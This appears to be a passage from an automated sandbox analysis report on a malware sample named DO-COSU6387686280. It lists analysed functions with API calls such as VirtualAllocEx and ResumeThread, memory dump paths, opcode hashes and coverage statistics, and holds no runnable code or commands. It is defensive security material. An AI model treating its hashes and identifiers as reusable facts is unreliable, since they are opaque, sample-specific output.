                                                                                        • Instruction Fuzzy Hash: EC21C2B59003589FDB10CFAAD984ADEBBF8EB48324F14841AE918A7350D374A944CFA5
                                                                                        Function 05E7B098 Relevance: 1.6, APIs: 1, Instructions: 60threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 05a8eecf0f9d0c951ed58f949c373411817cdf328d5dccf1536d69bfd928fbc5
                                                                                        • Instruction ID: 7b942e5f516e825c0693a4add39e0a7e2fa4452c6c51f99c9ae3fc89b17cc789
                                                                                        • Opcode Fuzzy Hash: 05a8eecf0f9d0c951ed58f949c373411817cdf328d5dccf1536d69bfd928fbc5
                                                                                        • Instruction Fuzzy Hash: 00115CB2D043488FDB10CFA9D4457EEFBF5EF88314F14841AD459A7640D7759904CBA5
                                                                                        Function 05E7B659 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05E7B6CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 11d0d8d52af6f76e403ace1c73a2ddeade053299b05afe62a83a29e7178eeda3
                                                                                        • Instruction ID: 077b96831c66492200757a39d9105005a94ff99604c3411af91e8fdbce8c416f
                                                                                        • Opcode Fuzzy Hash: 11d0d8d52af6f76e403ace1c73a2ddeade053299b05afe62a83a29e7178eeda3
                                                                                        • Instruction Fuzzy Hash: 601164769002499FDF10DFAAC845BEFBBF9EF88324F14881AE569A7250C7759500CFA4
                                                                                        Function 05E7B660 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05E7B6CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 36c1f57201870c009b757f92de65c8da2d0296799eb6c4efad1a6b7f56896175
                                                                                        • Instruction ID: c9d147680aad7d53fdda7901a0d11f0083c7f07926f383fe3b0af74253086799
                                                                                        • Opcode Fuzzy Hash: 36c1f57201870c009b757f92de65c8da2d0296799eb6c4efad1a6b7f56896175
                                                                                        • Instruction Fuzzy Hash: 3411567280024D8FDB10DFAAC844BDEBBF9EF48310F10841AE555A7250C7759500CFA4
                                                                                        Function 05E7B0A0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: c97931621ec6dde06621bfc661bc9c9ceff873c73f41be8df3131de5744c68fe
                                                                                        • Instruction ID: ed533e548e755584507b09151a1d3331417d38f5cb7d06866bb859da945ade72
                                                                                        • Opcode Fuzzy Hash: c97931621ec6dde06621bfc661bc9c9ceff873c73f41be8df3131de5744c68fe
                                                                                        • Instruction Fuzzy Hash: 981128B1D043488FDB10DFAAC44579EFBF8AB88214F14841AD419A7640C775A940CBA5
                                                                                        Function 05E7DFE8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 05E7E04D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: f0f900685d0e88c2bc5a6c83de63a869e8fe6e3d2fe5a0a06dd0a37c2ae8c3aa
                                                                                        • Instruction ID: fdbaf7bb11013ec18802e8951e0437d4521cec2cd0a55b04d7beb90b0ee44b9f
                                                                                        • Opcode Fuzzy Hash: f0f900685d0e88c2bc5a6c83de63a869e8fe6e3d2fe5a0a06dd0a37c2ae8c3aa
                                                                                        • Instruction Fuzzy Hash: 1E1103B68002489FDB10CF9AD985BDEBFF8FB48314F14844AE459A7300C3B9A944CFA1
                                                                                        Function 013EAEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 013EAF5E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430941736.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e0000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 0aecfe028e45d82157905b21c5d56974071d632850af86c5a49c58a75bb46cbf
                                                                                        • Instruction ID: 8828d5d3b294e176fda48465f61ea45f389ec86603cc254b9e50b5e4fa4cfd69
                                                                                        • Opcode Fuzzy Hash: 0aecfe028e45d82157905b21c5d56974071d632850af86c5a49c58a75bb46cbf
                                                                                        • Instruction Fuzzy Hash: F1110FB5C007498FDB10CF9AC844BDEFBF4EB88218F10841AD429A7240C379A54ACFA1
                                                                                        Function 05E7A150 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 05E7E04D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: a0c4008c873d5a9508eb65bf4b683b4d20854940c0c6251090b58e1ad3c61944
                                                                                        • Instruction ID: 14cfc2a76d1acd684d238fbecccda1afdce0c3155ea0197865d7474bbf608c17
                                                                                        • Opcode Fuzzy Hash: a0c4008c873d5a9508eb65bf4b683b4d20854940c0c6251090b58e1ad3c61944
                                                                                        • Instruction Fuzzy Hash: 431133B58043089FDB20CF9AC885BDEBBF8EB48310F10845AE558A7300C3B5A940CFA1
                                                                                        Function 07490532 Relevance: 1.3, APIs: 1, Instructions: 52COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CloseHandle.KERNELBASE(?), ref: 07490590
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445592546.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7490000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: 0a3651bf0e0dc74b678151c5a2f6eef1e8dc37406823eb849cdaefb8a45876e1
                                                                                        • Instruction ID: 9091c4648cf95e81733f4274c6fad183c6c3168e0467452b4af158c376de1235
                                                                                        • Opcode Fuzzy Hash: 0a3651bf0e0dc74b678151c5a2f6eef1e8dc37406823eb849cdaefb8a45876e1
                                                                                        • Instruction Fuzzy Hash: 9F1125B68006499FDB20CFAAD445BDEBBF4EB88320F11841AD558A7740D778A944CFA5
                                                                                        Function 07490538 Relevance: 1.3, APIs: 1, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CloseHandle.KERNELBASE(?), ref: 07490590
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445592546.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7490000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: a199b15c2f6427030aa43b3dd46fbe599bae44c5e69baf1780e30d97a9046b58
                                                                                        • Instruction ID: 4c08fe85929302d8aa42a481ddac60ca05d29670ba70c6ff0e2308262a6ead32
                                                                                        • Opcode Fuzzy Hash: a199b15c2f6427030aa43b3dd46fbe599bae44c5e69baf1780e30d97a9046b58
                                                                                        • Instruction Fuzzy Hash: 701115B58007499FDB20DF9AC485BDEBBF4EF48320F11842AD569A7340D778A544CFA5
                                                                                        Function 0122D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430384365.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_122d000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 999174d0846a36d4f1aeed1d9cc07164e282b37491d5297c933a51fba0769fbd
                                                                                        • Instruction ID: c325ac1829df8e6fc271e45bc1144cec081104345a08dfaa8446cc6304ec9b49
                                                                                        • Opcode Fuzzy Hash: 999174d0846a36d4f1aeed1d9cc07164e282b37491d5297c933a51fba0769fbd
                                                                                        • Instruction Fuzzy Hash: 772167B5514348FFDB05DF94C9C0B6ABBA5FB88324F20C16DE9090B246C336E456CBA2
                                                                                        Function 0123D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430476032.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_123d000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dc58073533457ff00a40edb0e34244d0c43bc0c8027f6477648b8b2b885f8b8b
                                                                                        • Instruction ID: 2cb04f565fdffff6edf5a4f9267c34d89616db594e5bb7c1fc9a5d9c70dd32a3
                                                                                        • Opcode Fuzzy Hash: dc58073533457ff00a40edb0e34244d0c43bc0c8027f6477648b8b2b885f8b8b
                                                                                        • Instruction Fuzzy Hash: 902134B1524308EFEB01DFA4C9C0B26BBA1FBC4324F60C56DE9494B243C376D846CA61
                                                                                        Function 0123D01C Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430476032.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_123d000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 10ac42c889e169614f0d1589c53c47be217839db5255b940be91c2e6465e12e5
                                                                                        • Instruction ID: e80203463388213df36a78a117a7825d3d0230e816de1a8843cfbb345dfa8d8a
                                                                                        • Opcode Fuzzy Hash: 10ac42c889e169614f0d1589c53c47be217839db5255b940be91c2e6465e12e5
                                                                                        • Instruction Fuzzy Hash: A92100B1614308EFDB15DFA4D8C0B26FBA5FBC4B14F60C569E94A0B242C376D447CA62
                                                                                        Function 0123D006 Relevance: .1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430476032.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_123d000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4a424c27508988fb232e9af909f7f39ae620ebe75ffe7cafd431b7a26f99706a
                                                                                        • Instruction ID: 2d75cef33e918098b902ebeb68008a7b93588ad6edafc5508fd691755c17afae
                                                                                        • Opcode Fuzzy Hash: 4a424c27508988fb232e9af909f7f39ae620ebe75ffe7cafd431b7a26f99706a
                                                                                        • Instruction Fuzzy Hash: 2D21B3B14083849FCB02CF64D994711BF71EB86314F28C5DAD9498F2A7C33A980ACB62
                                                                                        Function 0122D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430384365.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_122d000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
                                                                                        • Instruction ID: cd85ab8d6bc62f0727d816841cd8964a2497ccd6cbc44854d3f7c79d050c591a
                                                                                        • Opcode Fuzzy Hash: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
                                                                                        • Instruction Fuzzy Hash: 67112676404284DFDB12CF44D9C4B5ABF71FB84324F24C2A9D9090B657C33AE45ACBA1
                                                                                        Function 0123D1CF Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430476032.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_123d000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
                                                                                        • Instruction ID: 9d7a3cb1173a43007cf769ceb2d84c61de6581016d987cbcb4e5e0f1a6f1a2ca
                                                                                        • Opcode Fuzzy Hash: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
                                                                                        • Instruction Fuzzy Hash: 2D11BBB5504284DFDB02CF54C5C4B15BBA1FB84228F24C6A9D9494B697C33AD44ACB61
                                                                                        Function 0122D759 Relevance: .0, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430384365.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_122d000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 18e0d81fef4405ccc07ae276b8217f27e28be21ed4188d8a8a9d024bc4e07b73
                                                                                        • Instruction ID: 8d1209545fc61056591d98654f30d598933177b455fd1def7c9f6ebb29ee013b
                                                                                        • Opcode Fuzzy Hash: 18e0d81fef4405ccc07ae276b8217f27e28be21ed4188d8a8a9d024bc4e07b73
                                                                                        • Instruction Fuzzy Hash: 6601DB71514398BBF7244EA5CC84B6BFFD8EF45724F18C41AEE094A286C37D9440C672
                                                                                        Function 0122D758 Relevance: .0, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430384365.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_122d000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ecd974eef18d44ec9148cf521c51cedeb1e525fffa7cf1a0071444bdf77c0ab7
                                                                                        • Instruction ID: a48b30adebe74052e689efca06506965de00586aea1917e42a46edf748331906
                                                                                        • Opcode Fuzzy Hash: ecd974eef18d44ec9148cf521c51cedeb1e525fffa7cf1a0071444bdf77c0ab7
                                                                                        • Instruction Fuzzy Hash: CBF06271404394AFE7248E5ADD84B66FFE8EF41734F18C45AEE084A287C3799844CBB1

                                                                                        Non-executed Functions

                                                                                        Function 05E78D78 Relevance: 1.6, Strings: 1, Instructions: 331COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: U
                                                                                        • API String ID: 0-3372436214
                                                                                        • Opcode ID: 60b411e37e33ab59fa396c901330c4445aa135d70369a4b1dd14a2f1c2671209
                                                                                        • Instruction ID: 3e12708a236f26f92bb59402812b21c2520c5fc5b7e9fa6ddf226b04d2717ef6
                                                                                        • Opcode Fuzzy Hash: 60b411e37e33ab59fa396c901330c4445aa135d70369a4b1dd14a2f1c2671209
                                                                                        • Instruction Fuzzy Hash: 48E11975E04219CFDB14DFA8C984AAEBBB2BF89304F24816AD454AB356D7309D41CF61
                                                                                        Function 05E79608 Relevance: .3, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c95353713959a201dc76fef55c3b777c4a9a67d29723ac40ec52455e382520b6
                                                                                        • Instruction ID: 82ec58b4b086ecf95da82aa478b17aa9fc6caa118579e96387c68d88386b1056
                                                                                        • Opcode Fuzzy Hash: c95353713959a201dc76fef55c3b777c4a9a67d29723ac40ec52455e382520b6
                                                                                        • Instruction Fuzzy Hash: C8E1F775E04219CFDB14DFA9C580AAEFBF2BF89304F24816AD454AB356D731A941CFA0
                                                                                        Function 05E791D0 Relevance: .3, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b5f5cba1af98f996640986b779cdb54f431c79746edece3aa23553ef198e6e1a
                                                                                        • Instruction ID: 21db6c3c93be611fffbb013efc4781391c9bc518705a2f03690ebcc064589e4a
                                                                                        • Opcode Fuzzy Hash: b5f5cba1af98f996640986b779cdb54f431c79746edece3aa23553ef198e6e1a
                                                                                        • Instruction Fuzzy Hash: 2CE10674E00219CFDB14DFA9C580AAEBBF2FF89305F24816AD459AB356D731A941CF60
                                                                                        Function 05E7B228 Relevance: .3, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f1c6319d8282428fe76209c0a18fca445de813855db372277bd65063d4f5384
                                                                                        • Instruction ID: 5342dd2d7bb407fccb604d52e3e2b2f284ae44fe05e9828931ad7c0c74a79cc7
                                                                                        • Opcode Fuzzy Hash: 8f1c6319d8282428fe76209c0a18fca445de813855db372277bd65063d4f5384
                                                                                        • Instruction Fuzzy Hash: 2FE1F674E00219DFDB14DFA9C580AAEFBB2BF89305F24816AD454AB355E730A941CFA4
                                                                                        Function 05E7B810 Relevance: .3, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e50fa88c1c21da47462a1ea10fa06dca66baf67fca2b6972e8a65d5a176877a3
                                                                                        • Instruction ID: 4f761ee1a09e018322f1f1062e2a5c195e8d5fd2707b6024836899596f1faad8
                                                                                        • Opcode Fuzzy Hash: e50fa88c1c21da47462a1ea10fa06dca66baf67fca2b6972e8a65d5a176877a3
                                                                                        • Instruction Fuzzy Hash: 21E1E474E04219CFDB14DFA9C580AAEFBF2BF89305F24816AD859AB355D730A941CF60
                                                                                        Function 05E7054F Relevance: .3, Instructions: 268COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b0f2913d19ea59becc194e9bff95a78ae931a09ebe1ebf906a7fe1d0b9385c13
                                                                                        • Instruction ID: a8610c14b80e0a085a0d21989a6e3c3f0103ba7b955738be5f0a6e1db982ab25
                                                                                        • Opcode Fuzzy Hash: b0f2913d19ea59becc194e9bff95a78ae931a09ebe1ebf906a7fe1d0b9385c13
                                                                                        • Instruction Fuzzy Hash: E7D1F635D2075ADADB00EB64D990ADDB7B1FF99300F609B9AD4097B210EF706AC4CB91
                                                                                        Function 013ED51C Relevance: .3, Instructions: 264COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430941736.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e0000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8600f6747cd0ff220f3fcdb5c29023006fc22881eb6d842c4d3370b0518cba35
                                                                                        • Instruction ID: 4cc21da155a3123e5a30cc3804f13019dbc07f410b747eaf6e8241e156ca9114
                                                                                        • Opcode Fuzzy Hash: 8600f6747cd0ff220f3fcdb5c29023006fc22881eb6d842c4d3370b0518cba35
                                                                                        • Instruction Fuzzy Hash: 95A14E32E0031ACFCF05DFB9C84459EBBF6BF95304B158569E905AB2A1DBB1E915CB40
                                                                                        Function 05E70560 Relevance: .3, Instructions: 264COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 825b117d60ec761ba0423d318706df03147ce49a9db994f9d6e64ca1a15bd9b0
                                                                                        • Instruction ID: c3e69a0c081666adfcbb9e9eaadb57a4ba4fb36df1508a67f07cdfa60bf7d09a
                                                                                        • Opcode Fuzzy Hash: 825b117d60ec761ba0423d318706df03147ce49a9db994f9d6e64ca1a15bd9b0
                                                                                        • Instruction Fuzzy Hash: FCD1E635D2075ADADB10EB64D890ADDB7B1FF99300F609B9AD4097B210EB706AC4CB91
                                                                                        Function 05E782A0 Relevance: .1, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 134772b31d9263f91cab11ee03ac82416e399b598647c7497500db95be0495a3
                                                                                        • Instruction ID: 3d7c24de0c3e53fbc46a9e16572029d27882d5fb58e76eabdb4ab29e616e866f
                                                                                        • Opcode Fuzzy Hash: 134772b31d9263f91cab11ee03ac82416e399b598647c7497500db95be0495a3
                                                                                        • Instruction Fuzzy Hash: 5951E474E0920DDFCB04CF9AD8489EEBBFAFB99310F14A026E459A7211E7309941CB54
                                                                                        Function 05E7B218 Relevance: .1, Instructions: 138COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e39aa1648a8ab2ca0cd7d1161389c0c72b10ca27514d4934f7499d248468138c
                                                                                        • Instruction ID: a98b17447f603f1cf845939952aca97b62c3d775d8edc314ccea7af8537b7022
                                                                                        • Opcode Fuzzy Hash: e39aa1648a8ab2ca0cd7d1161389c0c72b10ca27514d4934f7499d248468138c
                                                                                        • Instruction Fuzzy Hash: C5513870E002199FDB14DFA9C9809AEFBF6FF89300F24816AD458AB315D7309942CFA0
                                                                                        Function 05E78290 Relevance: .1, Instructions: 130COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1d39057d286805f2111c7fc2fbd0e159fa387cbc3f8e19b35c8e000eac0d321f
                                                                                        • Instruction ID: fd57cbdf411d45ad97fe84188762d927d327400f0e10cf50df42b993c3a7195d
                                                                                        • Opcode Fuzzy Hash: 1d39057d286805f2111c7fc2fbd0e159fa387cbc3f8e19b35c8e000eac0d321f
                                                                                        • Instruction Fuzzy Hash: 6B410370E0920DDFCB04CFAED8485EEBBF6FB99310F14A12AE45AA7251E7348941CB50

                                                                                        Execution Graph

                                                                                        Execution Coverage:1.1%
                                                                                        Dynamic/Decrypted Code Coverage:5.1%
                                                                                        Signature Coverage:5.1%
                                                                                        Total number of Nodes:138
                                                                                        Total number of Limit Nodes:10
